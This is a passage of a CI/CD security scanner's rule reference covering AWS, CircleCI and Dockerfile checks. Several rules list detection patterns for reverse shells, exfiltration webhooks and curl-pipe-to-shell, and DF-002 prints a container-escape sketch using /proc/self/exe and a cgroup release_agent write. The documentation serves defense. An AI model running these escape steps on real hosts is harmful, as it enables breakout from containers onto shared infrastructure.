Recommendation. Treat as a potential compromise. Identify which principal or pipeline ran the CodeBuild project recently, rotate its service role's credentials, audit CloudTrail for outbound activity to the matched hosts, and, if an inline buildspec is in use (CB-008), enforce repo-sourced buildspecs under branch protection so the next malicious edit requires a PR.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain
example,fixture,sample,demo, ortestare auto-suppressed; bare lines in a production pipeline still fire. - Defaults to LOW confidence. Filter with
--min-confidence MEDIUMto ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: CB-011 in the AWS provider.
CC-001: Orb not pinned to exact semver HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Orb references in the orbs: block must include an @x.y.z suffix to lock a specific version. References without @, with @volatile, or with only a major (@1) or major.minor (@5.1) version float and can silently pull in malicious updates.
Recommendation. Pin every orb to an exact semver version (circleci/node@5.1.0). Floating references like @volatile, @1, or bare names without @ resolve to whatever is latest at build time, allowing a compromised orb update to execute in the pipeline.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-001 in the CircleCI provider.
CC-002: Script injection via untrusted environment variable HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. CircleCI exposes environment variables like $CIRCLE_BRANCH, $CIRCLE_TAG, and $CIRCLE_PR_NUMBER that are controlled by the event source (branch name, tag, PR). Interpolating them unquoted into run: commands allows shell injection via specially crafted branch or tag names.
Recommendation. Do not interpolate attacker-controllable environment variables (CIRCLE_BRANCH, CIRCLE_TAG, CIRCLE_PR_NUMBER, etc.) directly into shell commands. Pass them through an intermediate variable and quote them, or use CircleCI pipeline parameters instead.
Source: CC-002 in the CircleCI provider.
CC-005: AWS auth uses long-lived access keys in environment block MEDIUM 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Long-lived AWS access keys declared directly in a job's environment: block are visible to anyone who can read the config. They cannot be rotated automatically and remain valid until manually revoked. OIDC-based federation yields short-lived credentials per build.
Recommendation. Remove AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from the job environment: block. Use CircleCI's OIDC token with aws-cli/setup orb's role-based auth, or store credentials in a context with security group restrictions.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-005 in the CircleCI provider.
CC-008: Credential-shaped literal in config body CRITICAL 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Every string in the config is scanned against a set of credential patterns (AWS access keys, GitHub tokens, Slack tokens, JWTs, Stripe, Google, Anthropic, etc.). A match means a secret was pasted into YAML, the value is visible in every fork and every build log and must be treated as compromised.
Recommendation. Rotate the exposed credential immediately. Move the value to a CircleCI project environment variable or a context and reference it via the variable name. For cloud access, prefer OIDC federation over long-lived keys.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example
AKIAIOSFODNN7EXAMPLEis deliberately NOT suppressed, if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: CC-008 in the CircleCI provider.
CC-009: Deploy job missing manual approval gate MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. In CircleCI, manual approval is implemented by adding a job with type: approval to the workflow and making the deploy job require it. Without this gate, any push to the triggering branch deploys immediately with no human review.
Recommendation. Add a type: approval job that precedes the deploy job in the workflow, and list it in the deploy job's requires:. This ensures a human must click Approve in the CircleCI UI before production changes roll out.
Source: CC-009 in the CircleCI provider.
CC-010: Self-hosted runner without ephemeral marker MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Self-hosted runners that persist between jobs leak filesystem and process state. A PR-triggered job writes to /tmp; a subsequent prod-deploy job on the same runner reads it. The check looks for resource_class values containing 'self-hosted', if found, it checks for 'ephemeral' in the value. Also checks for machine: true combined with a self-hosted resource class.
Recommendation. Configure self-hosted runners to tear down between jobs. Use a resource_class value that includes an ephemeral marker, or use CircleCI's machine executor with runner auto-scaling so each job gets a fresh environment.
Source: CC-010 in the CircleCI provider.
CC-011: No store_test_results step (test results not archived) LOW
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Without store_test_results, test output is only available in the raw build log. Archiving test results enables CircleCI's test insights, timing-based splitting, and provides an audit trail that links each build to its test outcomes.
Recommendation. Add a store_test_results step to jobs that run tests. This archives test results in CircleCI for traceability, trend analysis, and debugging flaky tests.
Source: CC-011 in the CircleCI provider.
CC-013: Deploy job in workflow has no branch filter MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Without branch filters, a deploy job triggers on every branch push, including feature branches and forks. Restricting sensitive jobs to specific branches limits the blast radius of a compromised commit.
Recommendation. Add filters.branches.only to deploy-like workflow jobs so they only run on protected branches (e.g. main, release/*).
Source: CC-013 in the CircleCI provider.
CC-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a CircleCI config. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
Source: CC-016 in the CircleCI provider.
CC-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a CircleCI config give the container full access to the runner, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-017 in the CircleCI provider.
CC-019: add_ssh_keys without fingerprint restriction HIGH
Evidences: CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. A bare - add_ssh_keys step (without fingerprints:) loads every SSH key configured on the project into the job. This violates least privilege, the job gains access to keys it does not need, increasing the blast radius if the job is compromised.
Recommendation. Always specify fingerprints: when using add_ssh_keys to restrict which SSH keys are loaded into the job. A bare add_ssh_keys step loads ALL project SSH keys.
Source: CC-019 in the CircleCI provider.
CC-020: No vulnerability scanning step MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
Source: CC-020 in the CircleCI provider.
CC-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-023 in the CircleCI provider.
CC-024: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Signing (cosign sign) binds identity to bytes; attestation (cosign attest) binds a structured claim about how the artifact was built. SLSA verifiers check the latter so consumers can enforce builder/source/parameter policies.
Recommendation. Add a run: cosign attest command against a provenance.intoto.jsonl statement, or use the circleci/attestation orb. CC-006 covers signing; this rule covers the build-provenance step SLSA Build L3 requires.
Source: CC-024 in the CircleCI provider.
CC-026: Config contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Fires on concrete indicators only (reverse shells, base64-decoded execution, miner binaries, Discord/Telegram webhooks, webhook.site callbacks, credential-dump pipes, history-erasure).
Recommendation. Treat as a potential compromise. Identify the PR that added the matching step(s), rotate any contexts/env vars the pipeline can reach, and audit recent CircleCI runs for outbound traffic to the matched hosts.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain
example,fixture,sample,demo, ortestare auto-suppressed; bare lines in a production pipeline still fire. - Defaults to LOW confidence. Filter with
--min-confidence MEDIUMto ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: CC-026 in the CircleCI provider.
CC-027: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Complements CC-002 (script injection from untrusted context). Fires on intrinsically risky shell idioms, eval, sh -c "$X", backtick exec, regardless of whether the input source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary.
Known false positives.
eval "$(ssh-agent -s)"and similareval "$(<literal-tool>)"bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.
Source: CC-027 in the CircleCI provider.
CC-030: Workflow job uses context without branch filter or approval gate MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. CircleCI contexts are the recommended way to store shared secrets, but binding a context to a job is only half of least-privilege, the other half is controlling when the binding activates. Unrestricted workflow entries with context: turn every branch push into a secret-read event.
Recommendation. Either add filters.branches.only: [<protected branches>] to restrict when the context-bound job runs, or require a type: approval job in requires: so a human gates the secret-carrying execution. Without either gate, every push to the project loads the context's secrets into an ephemeral runner where any compromised step can exfiltrate them.
Source: CC-030 in the CircleCI provider.
CCM-001: CodeCommit repository has no approval rule template attached HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Approval-rule templates are CodeCommit's analog of GitHub's branch-protection require-review. Without one associated, the repository accepts merges from any push-permitted principal, including the PR author themselves, without any second-pair-of-eyes gate.
Recommendation. Create a CodeCommit approval-rule template requiring at least one approval from a designated pool of reviewers and associate it with every repository. Without one, any PR author with push rights can self-approve and merge.
Source: CCM-001 in the AWS provider.
CCM-003: CodeCommit trigger targets SNS/Lambda in a different account MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. A repo trigger pointing at an SNS topic or Lambda in a different account fires under the receiving account's permissions on every push. Sometimes this is the intended shape (a centralized notifications account), but a cross-account fan-out from a compromised repo can drive actions in the receiving account that the source-account owner can't directly observe.
Recommendation. Move trigger targets into the same account as the repository or explicitly document the cross-account relationship. Cross-account triggers extend the blast radius of a repository compromise to whatever the target ARN can do.
Source: CCM-003 in the AWS provider.
CD-001: Automatic rollback on failure not enabled MEDIUM
Evidences: CC7.4 Identified security incidents trigger a response process.
How this is detected. Without autoRollbackConfiguration, a CodeDeploy deployment that fails leaves the failed revision live until an operator notices. The default is opt-in, not opt-out, deployments fail-open, not fail-back.
Recommendation. Enable autoRollbackConfiguration with at least the DEPLOYMENT_FAILURE event so CodeDeploy automatically reverts to the last successful revision when a deployment fails.
Source: CD-001 in the AWS provider.
CD-002: AllAtOnce deployment config, no canary or rolling strategy HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. AllAtOnce shifts 100% of traffic to the new revision in one step. There's no gradient to halt on if a CloudWatch alarm trips mid-rollout, the bad revision is already serving every request. Canary / linear configs introduce the shift-then-watch shape that lets monitors catch a regression before it's universal.
Recommendation. Switch to a canary or linear deployment configuration (e.g. CodeDeployDefault.LambdaCanary10Percent5Minutes or a custom rolling config) so that defects are caught before they affect all instances or traffic.
Source: CD-002 in the AWS provider.
CD-003: No CloudWatch alarm monitoring on deployment group MEDIUM
Evidences: CC7.3 Security events are evaluated to determine if they require response, CC7.4 Identified security incidents trigger a response process.
How this is detected. Alarm-based rollback is what lets a canary configuration actually stop a bad deploy mid-flight. Without alarms wired into alarmConfiguration, CodeDeploy's only signal that the deploy went wrong is the deployment-state machine itself, which doesn't notice an application-level regression. CD-002's canary work and this rule's alarm-based halt are paired.
Recommendation. Add CloudWatch alarms (e.g. error rate, 5xx count, latency p99) to the deployment group's alarmConfiguration. Enable automatic rollback on DEPLOYMENT_STOP_ON_ALARM to halt bad deployments.
Source: CD-003 in the AWS provider.
CP-001: No approval action before deploy stages HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A pipeline that goes Source -> Build -> Deploy with no Approval action means every commit on the source branch ships, with no human ack between code-merged and code-running-in-prod. The Manual approval action is the intentional pause point, combine with CP-005 for production-tagged stages specifically.
Recommendation. Add a Manual approval action to a stage that precedes every Deploy stage that targets a production or sensitive environment.
Source: CP-001 in the AWS provider.
CP-003: Source stage using polling instead of event-driven trigger LOW
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. PollForSourceChanges=true polls the source repo every minute or two. Beyond the API-quota and latency cost, polling produces a less-useful CloudTrail story than event-driven triggers. You see the poll calls, not the specific commit that started the pipeline. EventBridge / CodeCommit triggers tie each pipeline start to the originating event.
Recommendation. Set PollForSourceChanges=false and configure an Amazon EventBridge rule or CodeCommit trigger to start the pipeline on change. This reduces latency, API usage, and improves auditability.
Known false positives.
PollForSourceChanges=trueis the CFN default for CodeCommit sources, so legacy templates can carry the flag without an active design decision behind it. The rule is advisory (consider EventBridge / CodeStarSourceConnection) rather than a real risk; defaults to LOW confidence so CI gates default-filter it.
Source: CP-003 in the AWS provider.
CP-004: Legacy ThirdParty/GitHub source action (OAuth token) HIGH
Evidences: CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. The legacy ThirdParty/GitHub source-action provider stores a long-lived OAuth token in the pipeline's action configuration. The token has whatever scope the granting GitHub user has, never rotates, and isn't directly revocable from the AWS side. CodeConnections (formerly CodeStar Connections) replaces this with an AWS-managed connection that the GitHub user can revoke.
Recommendation. Migrate to owner=AWS, provider=CodeStarSourceConnection and reference a CodeConnections connection ARN.
Source: CP-004 in the AWS provider.
CP-005: Production Deploy stage has no preceding ManualApproval MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. The complement to CP-001: this rule fires only on stages whose name contains prod / production / live. Even teams that intentionally skip approvals for dev / staging deploys usually want a human in the loop for a production-tagged target.
Recommendation. Add a Manual approval action immediately before any stage whose name contains prod / production. CP-001 covers the generic case; this rule specifically looks at production-tagged stages where the blast radius of an unreviewed deploy is largest.
Source: CP-005 in the AWS provider.
CP-007: CodePipeline v2 PR trigger accepts all branches HIGH
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. V2 pipelines added native PR triggers; without a branches.includes filter, any PR, including fork PRs from outside the org, fires the pipeline. The build stage runs with whatever IAM authority the pipeline's role carries, which is the full attack surface a fork-PR compromise can reach.
Recommendation. On V2 pipelines, add an includes filter under the trigger's branches block (and optionally pullRequest.events) so only PRs targeting specific branches run. Without a filter, any fork-PR can execute the pipeline's build and deploy stages.
Source: CP-007 in the AWS provider.
CT-001: No active CloudTrail trail in region HIGH
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. CloudTrail is the only AWS-native source of record for management-plane API calls. A region with no active trail blinds incident responders: a pipeline compromise is invisible once the in-memory CloudWatch buffer rolls over.
Recommendation. Create a CloudTrail trail that logs management events in this region and start logging. Without a trail, CodeBuild/CodePipeline/IAM API activity, including credential changes during a compromise, has no durable audit record.
Source: CT-001 in the AWS provider.
CT-002: CloudTrail log-file validation disabled MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. CloudTrail logs are S3 objects. Without log-file validation, an attacker with s3:PutObject on the trail bucket can edit log files to remove evidence of their activity, and there's no digest to compare against. With validation on, every hour of logs is summarized in a signed digest file under CloudTrail-Digest/.
Recommendation. Set LogFileValidationEnabled=true on every CloudTrail trail. Log validation produces a signed digest file alongside each log object so tampering by an attacker who also has S3 write access can be detected after the fact.
Source: CT-002 in the AWS provider.
CT-003: CloudTrail trail is not multi-region MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. An attacker who knows your CloudTrail trail is regional deliberately operates from a different region. Multi-region trails capture management events from every region into a single trail, closing the gap without you having to enumerate which regions you actually use.
Recommendation. Convert the trail to a multi-region trail. A single-region trail misses activity in every other region, an attacker aware of the scope can drive reconnaissance or persistence from an unlogged region.
Source: CT-003 in the AWS provider.
CW-001: No CloudWatch alarm on CodeBuild FailedBuilds metric LOW
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Failure-rate signals are how on-call learns about an unfamiliar build crashing in a loop, an attacker probing the build environment, or a CI quota being exhausted. CloudWatch captures the FailedBuilds metric automatically, the alarm is the missing fan-out.
Recommendation. Create a CloudWatch alarm on the AWS/CodeBuild namespace FailedBuilds metric (aggregated or per-project). Without one, repeated build failures during a compromise, or a runaway fork-PR build, won't reach on-call.
Source: CW-001 in the AWS provider.
CWL-001: CodeBuild log group has no retention policy LOW
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. CloudWatch Logs created by CodeBuild default to Never Expire retention. Build logs frequently echo secrets accidentally (a set -x script, an env dump in an error trace), so unbounded retention extends the exposure window for every secret a build has ever leaked. A short-but-finite retention also caps cost.
Recommendation. Set a retention policy on every /aws/codebuild/* log group. The default is 'Never Expire', which both racks up storage cost and keeps logs indefinitely past any compliance window.
Source: CWL-001 in the AWS provider.
CWL-002: CodeBuild log group not KMS-encrypted MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. CloudWatch Logs default encryption is service-managed, fine for confidentiality, but no audit trail or scoping. Build logs are a frequent secret-leak vector (CWL-001's rationale extended), so the same key-policy + Decrypt-event story you'd apply to S3 / Lambda / Secrets Manager is warranted here too.
Recommendation. Associate a customer-managed KMS key with every /aws/codebuild/* log group via associate-kms-key. Logs often contain secret material accidentally echoed by builds; encrypting them with a CMK means the key policy controls who can read the logs, not just S3/CloudWatch IAM.
Source: CWL-002 in the AWS provider.
DF-001: FROM image not pinned to sha256 digest HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Reuses _primitives/image_pinning.classify so the floating-tag semantics match GL-001 / JF-009 / ADO-009 / CC-003. PINNED_TAG (e.g. python:3.12.1-slim) is treated as unpinned here too, only an explicit @sha256: survives, since the tag is mutable on the registry side.
Recommendation. Resolve every base image to its current digest (docker buildx imagetools inspect <ref> prints it) and pin via FROM repo@sha256:<digest>. Automate refreshes with Renovate or Dependabot. A floating tag (:latest, :3, no tag) silently swaps the build base under every rebuild.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- Docker Hub typosquatting / namespace-takeover incidents (2017 onward): docker-library Sysdig and Aqua research documented thousands of malicious images uploaded under near-miss names (
alpinevsalphine, etc.) and occasional namespace recoveries shipping crypto-miners downstream. Digest-pinned consumers are immune; tag-pinned consumers pull whatever sits under the name today. - Codecov
codecov/codecov-actiontag-mutation incident (post-Codecov-Bash-uploader compromise): the upstream rotated the action's@v3tag during the fallout, and consumers pinning to the tag silently re-ran a different build than before. Digest pinning would have surfaced the change as a checksum mismatch instead of a silent swap.
Source: DF-001 in the Dockerfile provider.
DF-002: Container runs as root (missing or root USER directive) HIGH 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources, CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Multi-stage builds: only the final stage matters for runtime identity, since intermediate stages don't ship. The check scopes USER to the last FROM through end-of-file.
Recommendation. Add a USER <non-root> directive after package install steps (e.g. USER 1001 or USER appuser). Running as root inside a container is not isolation, a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- CVE-2019-5736 (runC host breakout): a malicious container running as root could overwrite the host's runC binary and compromise every other container on the node. Non-root containers were not exploitable.
- CVE-2022-0492 (cgroups v1 escape via release_agent): root inside a container with CAP_SYS_ADMIN could write to the host's release_agent file and execute arbitrary host code. Containers running as a non-root UID side-stepped the exploit class entirely.
Proof of exploit.
Vulnerable: image runs as root by default (no USER set).
FROM ubuntu:22.04 RUN apt-get update && apt-get install -y python3 COPY app.py /app/ CMD ["python3", "/app/app.py"]
Attack: when the container is breached (RCE in the app, a
kernel CVE, a misconfigured mount), the attacker runs as
UID 0. From there:
# CVE-2019-5736 path: overwrite /proc/self/exe to corrupt
# the host's runC binary — every container on the node
# the next launch executes attacker code on the host:
echo '#!/bin/sh\n/attacker_payload' > /proc/self/exe
# CVE-2022-0492 path: cgroup release_agent escape:
mkdir /tmp/cg && mount -t cgroup -o memory cgroup /tmp/cg
echo '/payload' > /tmp/cg/release_agent
echo 1 > /tmp/cg/notify_on_release
A non-root UID makes both paths fail at the first syscall.
Safe: drop to a dedicated unprivileged user.
FROM ubuntu:22.04 RUN apt-get update && apt-get install -y python3 \ && useradd --uid 1001 --create-home app COPY --chown=app:app app.py /app/ USER 1001 CMD ["python3", "/app/app.py"]
Source: DF-002 in the Dockerfile provider.
DF-003: ADD pulls remote URL without integrity verification HIGH
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure, CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. ADD with a URL is the historical Dockerfile footgun: it fetches at build time over HTTP(S) with no checksum and no signature, and the registry tag does not pin the source. A tampered server or DNS hijack silently swaps the content. COPY is for local files; RUN curl + verify is for remote ones.
Recommendation. Replace ADD https://... with a multi-step RUN: download the file with curl -fsSLo, verify a known-good checksum (sha256sum -c) or signature (cosign verify-blob), then extract / install. Better still: download the artifact in a builder stage and COPY it across. That way the verifier runs once at build time, not per-pull.
Source: DF-003 in the Dockerfile provider.
DF-004: RUN executes a remote script via curl-pipe / wget-pipe HIGH
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure, CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Reuses _primitives/remote_script_exec.scan so the vocabulary matches the equivalent CI-side rules (GHA-016, GL-016, BB-012, ADO-016, CC-016, JF-016).
Recommendation. Download to a file, verify checksum or signature, then execute. curl -fsSL <url> -o /tmp/x.sh && sha256sum -c <(echo '<digest> /tmp/x.sh') && bash /tmp/x.sh. Vendor installers from well-known hosts (rustup.rs, get.docker.com, ...) are reported with vendor_trusted=true so reviewers can calibrate.
Source: DF-004 in the Dockerfile provider.
DF-005: RUN uses shell-eval (eval / sh -c on a variable / backticks) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Reuses _primitives/shell_eval.scan, same primitive used by GHA-028 / GL-026 / BB-026 / ADO-027 / CC-027 / JF-030 so the safe / unsafe vocabulary matches across the tool.
Recommendation. Replace eval "$X" and sh -c "$X" with explicit argv invocations. If the build genuinely needs a templated command, render it through a sealed config file or use RUN --mount=type=secret with explicit input. $( … ) / backticks should never wrap interpolated user-controlled vars inside a Dockerfile.
Source: DF-005 in the Dockerfile provider.
DF-006: ENV or ARG carries a credential-shaped literal value CRITICAL
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Reuses _primitives/secret_shapes, flags AKIA-prefixed AWS keys outright (the literal AWS access-key shape) and credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) when the value is a non-empty literal.
Recommendation. Never hard-code credentials in a Dockerfile. ENV values are baked into the image layer history, even if the value is later overwritten, docker history --no-trunc reads the original. Use RUN --mount=type=secret for build-time secrets or runtime env injection (docker run -e SECRET=…) for runtime ones. Rotate any secret already exposed.
Source: DF-006 in the Dockerfile provider.
DF-007: No HEALTHCHECK directive declared LOW 🔧 fix
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. This is a defense-in-depth signal rather than an exploitation indicator, severity is LOW. A missing healthcheck doesn't create a vulnerability on its own, but downstream orchestrators (Kubernetes, ECS, Compose) cannot recover an unhealthy container they cannot detect, and that turns a soft failure (slow leak, deadlock) into a stale-process incident.
Recommendation. Declare a HEALTHCHECK so the orchestrator can detect stuck or zombie containers. Example: HEALTHCHECK --interval=30s --timeout=5s --retries=3 CMD curl -fsS http://localhost/healthz || exit 1. Skip this for builder/multi-stage intermediate images, only the runtime image needs one.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-007 in the Dockerfile provider.
DF-008: RUN invokes docker --privileged or escalates capabilities HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources, CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Mirrors GHA-017 / GL-017 / BB-013 / ADO-017 / CC-017 / JF-017 (docker run --privileged in CI scripts) but at Dockerfile build time. The risk is subtler: a privileged RUN step doesn't directly elevate the resulting image, but it gives the build host's docker daemon a chance to escape, and any tampered base image can exploit the elevated build.
Recommendation. A Dockerfile build step almost never legitimately needs --privileged or --cap-add SYS_ADMIN / ALL. If the build genuinely requires elevated capabilities (e.g. compiling a kernel module), do it in a sealed builder image and COPY the artifact out, don't carry the privileged execution into the runtime image.
Source: DF-008 in the Dockerfile provider.
DF-010: apt-get dist-upgrade / upgrade pulls unknown package versions LOW
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Running apt-get upgrade (or dist-upgrade) inside a Dockerfile is the classic pet-vs-cattle anti-pattern. Two back-to-back builds with the same Dockerfile can produce different images because the upstream archive moved between the two RUN invocations. dist-upgrade additionally relaxes dependency resolution. It can install / remove arbitrary packages to satisfy upgrades, so the resulting image's package set isn't even bounded by what the Dockerfile declares.
Recommendation. Drop the upgrade step. Build on a recent base image instead (rebuild your image when the base image gets a security patch, pin the base by digest per DF-001 so the rebuild is deterministic). apt-get install pkg=<version> for specific packages stays reproducible; upgrade / dist-upgrade does not.
Source: DF-010 in the Dockerfile provider.
DF-012: RUN invokes sudo HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. sudo inside a Dockerfile is almost always a copy-paste from a host README. Its presence usually means one of three things, all of them wrong: (a) the build is silently running as root and the operator misread it, (b) the image carries an unrestricted sudoers line that a runtime escape can abuse, or (c) the package install chain depends on TTY-aware sudo behavior that breaks under non-TTY docker build. None of these cases benefit from keeping the directive.
Recommendation. Drop sudo from the RUN. Either the build is already running as root (the default before any USER directive), in which case sudo is no-op noise, or the build switched to a non-root USER and needs root for a specific step, in which case temporarily revert with USER root for that RUN and switch back afterward.
Source: DF-012 in the Dockerfile provider.
DF-013: EXPOSE declares sensitive remote-access port CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary, CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. EXPOSE is documentation, not a firewall. It doesn't actually open the port. But EXPOSE 22 is a strong signal the image runs sshd, and any remote-access daemon inside the container blows up the threat model: now you have an extra auth surface, an extra service to keep patched, and a way for a compromised app to phone home from the outside. The container runtime / orchestrator's exec path covers every operational use case sshd traditionally served.
Recommendation. Remove the EXPOSE line for the remote-access port. If the operator legitimately needs to reach the container, exec into it (docker exec / kubectl exec). That path uses the orchestrator's auth and audit, doesn't open a network port, and doesn't ship an extra daemon inside the image. Containers should not run sshd / telnetd / ftpd / rsh-d / vncd / RDP alongside the application.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-013 in the Dockerfile provider.
DF-014: WORKDIR set to a system / kernel filesystem path CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
